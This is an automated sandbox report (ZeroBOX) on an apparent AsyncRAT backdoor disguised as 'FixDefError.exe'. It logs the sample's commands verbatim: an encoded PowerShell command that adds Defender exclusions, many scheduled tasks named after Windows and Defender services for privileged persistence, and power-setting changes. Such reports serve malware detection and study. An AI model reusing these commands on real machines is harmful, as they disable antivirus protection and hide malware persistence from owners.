Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	March 20, 2023, 9:50 a.m.	March 20, 2023, 10:04 a.m.

Size	2.3MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`1b664f2a0bede6c47e44ca8c0aad3de7`
SHA256	`908641c2c756b0a2762e4883f7defb050e1baa09d44be8cdad34c5aa562d65d9`
CRC32	`BE6E7B2A`
ssdeep	`24576:d6XFr/AUXPhtHbLLGpMamGEhP+boT/JsGz1UdbA4ZWIWId4gIehzsBgxUsHB:docUPht7XGpMjTPd/J7y5Bd/nv/`
PDB Path	ProgramInstaller.pdb
Yara	Is_DotNET_EXE - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT IsPE32 - (no description) PE_Header_Zero - PE File Signature

FixDefError.exe "C:\Users\test22\AppData\Local\Temp\FixDefError.exe"
2628
cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A"
3036
- powershell.exe powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A"
  812
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
1336
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
  2188
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
2240
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
  2436
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
2408
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
  2612
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
2656
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
  2772
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
1080
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
  2680
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
2632
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
  1796
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
1168
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
  3016
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
2076
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
  2120
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk351" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
1668
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk351" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
  2208
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk201" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
2308
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk201" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
  2620
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk263" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
1364
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk263" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
  2644
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk487" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
2392
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk487" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
  2696
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk469" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
2796
- schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk469" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
  300
cmd.exe "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
3000
- powercfg.exe powercfg /x -hibernate-timeout-ac 0
  3064
- powercfg.exe powercfg /x -hibernate-timeout-dc 0
  2124
- powercfg.exe powercfg /x -standby-timeout-ac 0
  2244
- powercfg.exe powercfg /x -standby-timeout-dc 0
  2232
- powercfg.exe powercfg /hibernate off
  2784
- schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
  1320
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
800
- schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
  2052

Name	Response	Post-Analysis Lookup
apps.identrust.com	A 121.254.136.27 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 121.254.136.57	23.216.159.81
rentry.co	A 198.251.88.130	198.251.88.130
www.google.com	A 142.250.204.68	142.250.206.228

IP Address	Status	Action
121.254.136.57	Active	Moloch
142.250.204.68	Active	Moloch
164.124.101.2	Active	Moloch
198.251.88.130	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49168 -> 198.251.88.130:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49164 -> 142.250.204.68:80	2036303	ET HUNTING Terse Unencrypted Request for Google - Likely Connectivity Check	A Network Trojan was detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.101:49168 198.251.88.130:443	C=US, O=Let's Encrypt, CN=R3	CN=rentry.co	59:bb:b9:be:2b:22:60:a5:a0:3a:54:7b:18:79:ab:d7:d5:a5:ec:cc

Queries for the computername (21 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 20, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 20, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 20, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 20, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 20, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 20, 2023, 9:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 20, 2023, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 20, 2023, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 20, 2023, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 20, 2023, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 20, 2023, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 20, 2023, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 20, 2023, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 20, 2023, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 20, 2023, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 20, 2023, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 20, 2023, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 20, 2023, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 20, 2023, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 20, 2023, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 20, 2023, 10:02 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (8 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 20, 2023, 9:50 a.m.			0	0
IsDebuggerPresent March 20, 2023, 9:50 a.m.			0	0
IsDebuggerPresent March 20, 2023, 9:51 a.m.			0	0
IsDebuggerPresent March 20, 2023, 10:02 a.m.			0	0
IsDebuggerPresent March 20, 2023, 10:02 a.m.			0	0
IsDebuggerPresent March 20, 2023, 10:02 a.m.			0	0
IsDebuggerPresent March 20, 2023, 10:02 a.m.			0	0
IsDebuggerPresent March 20, 2023, 10:02 a.m.			0	0

Command line console output was observed (26 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 20, 2023, 9:51 a.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW March 20, 2023, 9:51 a.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW March 20, 2023, 9:51 a.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW March 20, 2023, 9:51 a.m.	buffer: At line:1 char:33 console_handle: 0x00000047	1	1
WriteConsoleW March 20, 2023, 9:51 a.m.	buffer: + <#sUBvVIGpEJm#> Add-MpPreference <<<< <#kcITYcpBGLV#> -ExclusionPath <#jtGdz console_handle: 0x00000053	1	1
WriteConsoleW March 20, 2023, 9:51 a.m.	buffer: QcTEMOleJVpwil#> @( <#FoLTGYsFqsriYy#> $env:UserProfile, <#pKPevFFlRNiZEPXKhNI# console_handle: 0x0000005f	1	1
WriteConsoleW March 20, 2023, 9:51 a.m.	buffer: > $env:ProgramData) <#QUBJyveKFT#> -Force <#IqcWqGFjRcMEhYsub#> console_handle: 0x0000006b	1	1
WriteConsoleW March 20, 2023, 9:51 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x00000077	1	1
WriteConsoleW March 20, 2023, 9:51 a.m.	buffer: mmandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW March 20, 2023, 9:51 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000008f	1	1
WriteConsoleW March 20, 2023, 10:02 a.m.	buffer: SUCCESS: The scheduled task "SecurityHealthSystray" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 20, 2023, 10:02 a.m.	buffer: SUCCESS: The scheduled task "WindowsDefender" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 20, 2023, 10:02 a.m.	buffer: SUCCESS: The scheduled task "WmiPrvSE" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 20, 2023, 10:02 a.m.	buffer: SUCCESS: The scheduled task "AntiMalwareServiceExecutable" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 20, 2023, 10:02 a.m.	buffer: SUCCESS: The scheduled task "RuntimeBroker" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 20, 2023, 10:02 a.m.	buffer: SUCCESS: The scheduled task "MicrosoftEdgeUpd" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 20, 2023, 10:02 a.m.	buffer: SUCCESS: The scheduled task "OneDriveService" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 20, 2023, 10:02 a.m.	buffer: SUCCESS: The scheduled task "NvStray" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 20, 2023, 10:02 a.m.	buffer: SUCCESS: The scheduled task "WindowsDefenderServices\WindowsDefenderServicesServices_bk351" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 20, 2023, 10:02 a.m.	buffer: SUCCESS: The scheduled task "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk201" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 20, 2023, 10:02 a.m.	buffer: SUCCESS: The scheduled task "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk263" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 20, 2023, 10:02 a.m.	buffer: SUCCESS: The scheduled task "SettingSysHost\SettingSysHostServices_bk487" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 20, 2023, 10:02 a.m.	buffer: SUCCESS: The scheduled task "Agent Activation Runtime\Agent Activation RuntimeServices_bk469" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 20, 2023, 10:02 a.m.	buffer: SUCCESS: The scheduled task "ActivationRuntime" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 20, 2023, 10:02 a.m.	buffer: Hibernation failed with the following error: The request is not supported. The following items are preventing hibernation on this system. The system firmware does not support hibernation. console_handle: 0x0000000b	1	1
WriteConsoleW March 20, 2023, 10:02 a.m.	buffer: SUCCESS: The scheduled task "ActivationRule" has successfully been created. console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e07c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e10c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e10c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e10c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e10c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e10c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e10c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0c40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0c40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0c40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0880 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0440 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0440 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0440 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0440 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0440 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0440 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0440 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0440 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0440 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0440 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0440 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0440 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0440 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0440 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 20, 2023, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e0940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

ProgramInstaller.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 20, 2023, 9:50 a.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET http://www.google.com/

Performs some HTTP requests (2 events)

request	GET http://www.google.com/
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c

Allocates read-write-execute memory (usually to unpack itself) (50 out of 161 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 region_size: 1376256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a30000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 region_size: 851968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00780000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00810000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0060c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 20, 2023, 9:50 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
